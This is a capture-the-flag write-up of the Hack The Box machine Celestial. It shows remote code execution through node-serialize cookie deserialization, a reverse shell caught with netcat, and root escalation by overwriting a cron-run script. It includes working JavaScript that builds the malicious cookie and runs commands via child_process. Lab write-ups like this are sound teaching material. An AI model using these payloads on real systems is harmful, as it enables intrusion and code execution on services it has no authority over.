Welcome to our first writeup of the Hack The Box machine Celestial (10.10.10.85). It is rated medium, so it is a bit harder than the easy boxes. The whole machine is built around a Node.js deserialization bug that leads to remote code execution (RCE); you will have to search a little for the original write-up of that bug, and that is the only hint you get. Let's get into it without wasting time, and feel free to buy us a coffee ☕️


First we run nmap against the IP, since the browser shows nothing on the default ports.

nmap -sC -sV -oA celestial.nmap 10.10.10.85 (default scripts, version detection, output in all formats to celestial.nmap.*), which gives the following result.

nmap result

As you can see there is only one open port, 3000, running the Node.js Express framework. Open http://10.10.10.85:3000 and you get nothing more than "Hey Dummy 2 + 2 is 22". Open the cookie manager and look at the profile cookie: its value is URL-encoded base64, and once you strip both layers you are looking at a serialized JSON object that the application reads back on every request.

cookie manager

Now comes the main exploitation part, and it is tricky: first you have to understand the bug, which is explained on the OpsecX blog, so do not go any further without understanding it. Then download the required files, nodejs.py and log.js. The node-serialize module can be abused to achieve arbitrary code execution by passing it a crafted serialized JavaScript object: any string value that starts with the marker _$$ND_FUNC$$_ is passed to eval() during unserialize(), and if the function source is followed by () it is invoked immediately, before the application ever looks at the object.

Since the cookie is untrusted input, an attacker can craft a malicious cookie value to trigger this. Here we use nodejs.py to generate a reverse shell payload.

python nodejs.py [IP] [PORT], which gives the following result.

Reverse shell

Here IP is your tun0 address, which you can get with ifconfig. Now that you have the reverse shell source, copy it into log.js between the braces of the function: function(){HERE}

log.js builds the payload by calling the serialize() function of the same node-serialize module, so the output carries the _$$ND_FUNC$$_ marker the server's unserialize() looks for.

nodejs log.js (or node log.js, depending on how the binary is named on your distro) prints the serialized object. Add () right after the function's closing brace (highlighted in the image) so the function becomes an IIFE that runs the moment the server unserializes the cookie; without those two characters the function is only defined, never called.
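To make the bug concrete, here is an added example (it is not code from the writeup, from nodejs.py or from log.js) that models what the Celestial server does with the profile cookie: a stripped-down re-implementation of the eval step inside node-serialize's unserialize(), a builder that produces the URL-encoded base64 cookie the same way the steps above do by hand, and a hardened parser that never evaluates cookie content. The profile field names other than username, the command body and the allowlist are assumptions. The demo uses a harmless return 2+2 body so it can run locally; for the real attack you substitute the reverse-shell source that nodejs.py generates.

```javascript
// Added example, not the writeup's own code: a stripped-down model of the unsafe
// part of node-serialize's unserialize(), a builder for the Celestial profile cookie,
// and a hardened parser. Field names other than "username", the command strings and
// the allowlist are assumptions for illustration.

const FUNCFLAG = '_$$ND_FUNC$$_';

// Simplified model of node-serialize's unserialize(): any string value starting
// with FUNCFLAG is wrapped in parentheses and passed to eval(). When the string is
// "function(){...}()" the parentheses make it an IIFE, so the body runs while the
// cookie is still being parsed, before the app ever looks at the result.
function vulnerableUnserialize(input) {
  const obj = typeof input === 'string' ? JSON.parse(input) : input;
  for (const key of Object.keys(obj)) {
    const val = obj[key];
    if (val !== null && typeof val === 'object') {
      obj[key] = vulnerableUnserialize(val);
    } else if (typeof val === 'string' && val.startsWith(FUNCFLAG)) {
      obj[key] = eval('(' + val.slice(FUNCFLAG.length) + ')');
    }
  }
  return obj;
}

// The server URL-decodes and then base64-decodes the cookie before handing the
// JSON to unserialize(). decodeCookie() mirrors that so you can inspect a captured
// value; buildCookie() does the reverse to produce the attacker's value.
function decodeCookie(urlEncodedValue) {
  return Buffer.from(decodeURIComponent(urlEncodedValue), 'base64').toString('utf8');
}

function buildCookie(functionBody, profileFields) {
  const payload = Object.assign({}, profileFields, {
    // The trailing "()" is the part the writeup tells you to add by hand.
    rce: FUNCFLAG + 'function(){' + functionBody + '}()',
  });
  const b64 = Buffer.from(JSON.stringify(payload)).toString('base64');
  return encodeURIComponent(b64); // keep the same encoding as the original cookie
}

// Function body that runs a shell command on the target (assumed form; nodejs.py
// generates a full reverse shell instead). Returned as a string, never executed here.
function commandBody(cmd) {
  return "require('child_process').execSync(" + JSON.stringify(cmd) + ').toString()';
}

// Hardened replacement for the cookie handling: plain JSON.parse, an allowlist of
// expected keys, string-only values and no function marker anywhere. Nothing that
// came from the cookie is ever evaluated.
const ALLOWED_KEYS = new Set(['username', 'country', 'city', 'num']); // assumed schema
function safeParseCookie(urlEncodedValue) {
  const obj = JSON.parse(decodeCookie(urlEncodedValue));
  for (const [key, val] of Object.entries(obj)) {
    if (!ALLOWED_KEYS.has(key)) throw new Error('unexpected field: ' + key);
    if (typeof val !== 'string' || val.startsWith(FUNCFLAG)) {
      throw new Error('rejected value for field: ' + key);
    }
  }
  return obj;
}

// Demo with a harmless IIFE so it runs locally: the vulnerable parser executes the
// function and stores its return value in rce; the hardened parser refuses the cookie.
function demo() {
  const cookie = buildCookie('return 2+2', { username: 'Dummy' });
  const vulnerable = vulnerableUnserialize(decodeCookie(cookie));
  let hardenedRejected = false;
  try { safeParseCookie(cookie); } catch (e) { hardenedRejected = true; }
  return { rceResult: vulnerable.rce, hardenedRejected: hardenedRejected }; // { rceResult: 4, hardenedRejected: true }
}
```

Run it with node and call demo(): the value of rce is 4, computed by code that arrived inside the cookie, which is the entire bug. Swapping 'return 2+2' for commandBody('id') or the nodejs.py shell source gives you the real payload, and decodeCookie() is handy for reading the cookie you captured in Burp before you replace it.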

Now open a proxy tool to intercept the browser request; here we use Burp Suite. Refresh 10.10.10.85:3000, intercept the request and send it to Repeater. Base64-encode the payload generated above and put it in place of the profile cookie value, but do not send it yet; keep the same URL-encoding the original cookie used (the trailing = padding becomes %3D). Start a netcat listener with nc -nlvp 4444, then send the request from Repeater and you get a reverse shell like the one below.

ncshell

If you do not get a shell, repeat it a few times; in some cases it takes 5 to 6 minutes to arrive. Once in, explore the home directory: the user flag is there, and alongside it you will find script.py. To escalate privileges, edit script.py with nano as shown. This only works because root runs script.py on a schedule, so before editing it confirm with ls -l that the file is writable by you and watch for CRON entries in /var/log/syslog showing it being executed as root.

privesc

Alternatively, overwrite it from the shell: echo "import os; os.system('cat /root/root.txt >> /home/sun/root.txt')" > script.py. After the next scheduled run you will find root.txt in /home/sun. For a better idea you can go through the video walkthrough of the box below. Happy rooting 😃
